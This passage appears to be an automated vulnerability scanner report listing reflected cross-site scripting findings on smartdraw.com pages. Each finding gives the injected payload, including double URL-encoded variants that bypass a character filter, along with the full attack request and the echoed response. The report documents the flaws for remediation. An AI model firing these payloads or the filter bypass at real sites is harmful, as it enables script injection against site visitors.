X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:30 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:30 GMT; path=/
Set-Cookie: ASP.NET_SessionId=zbprv0455f2woe45n1vggnmm; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8774
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/fb652"style="x:expression(alert(1))"3dd903a5e32/x22/" rel="nofollow" target="_blank">
...[SNIP]...

3.171. http://www.smartdraw.com/specials/floorplans.asp/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/floorplans.asp/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b7f6%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522722649758a8 was submitted in the REST URL parameter 2. This input was echoed as 9b7f6"style="x:expression(alert(1))"722649758a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/9b7f6%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522722649758a8/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:33 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:33 GMT; path=/
Set-Cookie: ASP.NET_SessionId=n40tt5554keayxr2thqf5345; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8774
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/9b7f6"style="x:expression(alert(1))"722649758a8/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:
...[SNIP]...

3.172. http://www.smartdraw.com/specials/floorplans.asp/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/floorplans.asp/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be86b"><script>alert(1)</script>3870aea577b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /specials/floorplans.asp/x22?be86b"><script>alert(1)</script>3870aea577b=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=fpn; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: ASP.NET_SessionId=nt2h2455uxcxaky11tfmrdzo; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=1409283B-EDB5-4CA0-8629-95905BA865F1; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: SDLINKID=9188; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13081
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/specials/floorplans.asp/x22/?be86b"><script>alert(1)</script>3870aea577b=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

3.173. http://www.smartdraw.com/specials/floorplans.asp/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/floorplans.asp/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43486"><script>alert(1)</script>d3e5d5a301c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /specials/floorplans.asp/x22?43486"><script>alert(1)</script>d3e5d5a301c=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=fpn; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: ASP.NET_SessionId=i0k42w45onnbee45xd5i5a45; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=AC9569E3-A240-49CF-95D8-0CA3C93C810C; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: SDLINKID=9188; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13081
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/specials/floorplans.asp/x22/?43486"><script>alert(1)</script>d3e5d5a301c=1" rel="nofollow" target="_blank">
...[SNIP]...

3.174. http://www.smartdraw.com/specials/flowchart.asp/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/flowchart.asp/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3212f%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522de74a7c05db was submitted in the REST URL parameter 2. This input was echoed as 3212f"style="x:expression(alert(1))"de74a7c05db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/3212f%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522de74a7c05db/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:22 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:22 GMT; path=/
Set-Cookie: ASP.NET_SessionId=gfjqohyflklzjc3jlpnhf155; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8774
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/3212f"style="x:expression(alert(1))"de74a7c05db/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:
...[SNIP]...

3.175. http://www.smartdraw.com/specials/flowchart.asp/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/flowchart.asp/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77d5c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e0eacf7515f was submitted in the REST URL parameter 2. This input was echoed as 77d5c"style="x:expression(alert(1))"e0eacf7515f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/77d5c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e0eacf7515f/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ivhntdeja4wz04jdiflpz5ap; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8774
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/77d5c"style="x:expression(alert(1))"e0eacf7515f/x22/" rel="nofollow" target="_blank">
...[SNIP]...

3.176. http://www.smartdraw.com/specials/flowchart.asp/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/flowchart.asp/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5bdc"><script>alert(1)</script>30cb10048cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /specials/flowchart.asp/x22?c5bdc"><script>alert(1)</script>30cb10048cf=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=flo; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Set-Cookie: ASP.NET_SessionId=vm0ob2bkdsyf5h55cuo0kgm2; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=1C945EF3-6CA5-4560-AB01-DF12269C31D7; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Set-Cookie: SDLINKID=9189; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13400
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/specials/flowchart.asp/x22/?c5bdc"><script>alert(1)</script>30cb10048cf=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

3.177. http://www.smartdraw.com/specials/flowchart.asp/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/flowchart.asp/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d17f1"><script>alert(1)</script>da242985d73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /specials/flowchart.asp/x22?d17f1"><script>alert(1)</script>da242985d73=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=flo; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ytkcuz550fh0cezljmrjle45; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=D2F0A619-5E50-4744-A7B3-37280A44868D; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Set-Cookie: SDLINKID=9189; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13400
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/specials/flowchart.asp/x22/?d17f1"><script>alert(1)</script>da242985d73=1" rel="nofollow" target="_blank">
...[SNIP]...

3.178. http://www.smartdraw.com/specials/sd/buy-sd.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/sd/buy-sd.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b6e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e255e7c83b75 was submitted in the REST URL parameter 3. This input was echoed as 1b6e6"><script>alert(1)</script>255e7c83b75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/sd/1b6e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e255e7c83b75?id=343769/x22/x3eBuy HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:30 GMT
Content-Length: 8886
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:30 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:30 GMT; path=/
Set-Cookie: ASP.NET_SessionId=c2zv45jn1eebgs45s0y1xfqm; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/sd/1b6e6"><script>alert(1)</script>255e7c83b75/?id=343769/x22/x3eBuy&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; wid
...[SNIP]...

3.179. http://www.smartdraw.com/specials/sd/buy-sd.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/sd/buy-sd.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5919c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d2a7fce664a was submitted in the REST URL parameter 3. This input was echoed as 5919c"style="x:expression(alert(1))"d2a7fce664a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/sd/5919c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d2a7fce664a HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:34 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:34 GMT; path=/
Set-Cookie: ASP.NET_SessionId=obr3du45zbuce445aaaygqnk; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8767
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/sd/5919c"style="x:expression(alert(1))"d2a7fce664a/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

3.180. http://www.smartdraw.com/specials/sd/buy-sd.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/sd/buy-sd.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c172%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f436bf2670 was submitted in the REST URL parameter 3. This input was echoed as 2c172"><script>alert(1)</script>9f436bf2670 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/sd/buy-sd.htm2c172%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f436bf2670?id=343769/x22/x3eBuy HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:28 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:28 GMT; path=/
Set-Cookie: ASP.NET_SessionId=iunkdq55f4mrs0zhymery055; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8949
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/sd/buy-sd.htm2c172"><script>alert(1)</script>9f436bf2670?id=343769/x22/x3eBuy" rel="nofollow" target="_blank">
...[SNIP]...

3.181. http://www.smartdraw.com/specials/sd/buy-sd.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/sd/buy-sd.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d6a8%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220f4e3cd6ed9 was submitted in the REST URL parameter 3. This input was echoed as 6d6a8"style="x:expression(alert(1))"0f4e3cd6ed9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/sd/buy-sd.htm6d6a8%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220f4e3cd6ed9 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:29 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:29 GMT; path=/
Set-Cookie: ASP.NET_SessionId=1q0jrzerd2axjnu1z4yq5c55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8830
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/sd/buy-sd.htm6d6a8"style="x:expression(alert(1))"0f4e3cd6ed9" rel="nofollow" target="_blank">
...[SNIP]...

3.182. http://www.smartdraw.com/specials/sd/buy-sd.htm [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/sd/buy-sd.htm

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e89d"><script>alert(1)</script>e8ef8708314 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /specials/sd/buy-sd.htm?id=343769/x22/x3eBuy2e89d"><script>alert(1)</script>e8ef8708314 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Set-Cookie: ASP.NET_SessionId=amgihnv3fyp5ce55ycrm2svx; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=EE627197-7ED3-4E70-8C64-7A860D1C1696; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Set-Cookie: SDLINKID=341512; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Set-Cookie: DTIME=2/3/2011; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10283
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

